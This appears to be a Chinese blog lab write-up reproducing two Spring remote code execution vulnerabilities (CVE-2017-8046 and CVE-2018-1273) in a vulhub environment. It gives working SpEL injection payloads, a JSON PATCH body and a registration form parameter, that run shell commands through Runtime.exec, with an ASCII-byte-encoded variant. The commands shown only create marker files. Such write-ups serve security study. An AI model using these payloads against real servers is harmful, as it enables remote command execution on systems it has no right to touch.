当前位置: 首页 > news >正文

常见框架漏洞--Spring

news 来源:原创 2025/5/6 18:27:24

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

环境搭建

漏洞利用

1. 访问 http://your-ip:8080/customers/1

2.然后抓取数据包,使⽤PATCH请求来修改

[{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }]

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看是否上传成功

spring 代码执⾏ (CVE-2018-1273)

搭建环境后访问

访问users

填写注册信息,抓包

在username后加

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")]=&password=&repeatedPassword=

进入终端查看

相关文章:

  • 部署Tomcat及jdk
  • Redis Sentinel 详解
  • linux的权限管理
  • 在 ASP.NET Core 中实现限流(Rate Limiting):保护服务免受滥用与攻击
  • Flask接口开发--POST接口
  • Linux(8.5)FTP
  • win32汇编环境,网络编程入门之十
  • C++实现决策树与随机森林调优困境:从性能瓶颈到高效突破
  • K8s 是什么? 基本元件、核心功能、4 大优点一次看!
  • 【差分隐私相关概念】一个问题的对偶转换
  • 【江协科技STM32】Unix时间戳BKP备份寄存器RTC实时时钟(学习笔记)
  • 基于SpringBoot的名著阅读网站
  • 【RHCE】综合实战练习
  • Unity 实现一个简易可拓展性的对话系统
  • deepseek搭建本地私有知识库dify安装介绍docker compose图文教程
  • Spring漏洞再现
  • 卷积神经网络 - 关于LeNet-5的若干问题的解释
  • 【机器学习/大模型/八股文 面经 (一)】
  • 深度学习技术与应用的未来展望:从基础理论到实际实现
  • Spark Driver生成过程详解
  • 专家解读《人源类器官研究伦理指引》:构建类器官研究全过程伦理治理框架
  • 罗马尼亚总理乔拉库宣布辞职
  • 马上评|子宫肌瘤惊现男性患者,如此论文何以一路绿灯?
  • 两个灵魂,一支画笔,意大利艺术伴侣的上海灵感之旅
  • 我驻旧金山总领事馆:黄石公园车祸中受伤同胞伤情稳定
  • 牧草之王苜蓿的江南驯化史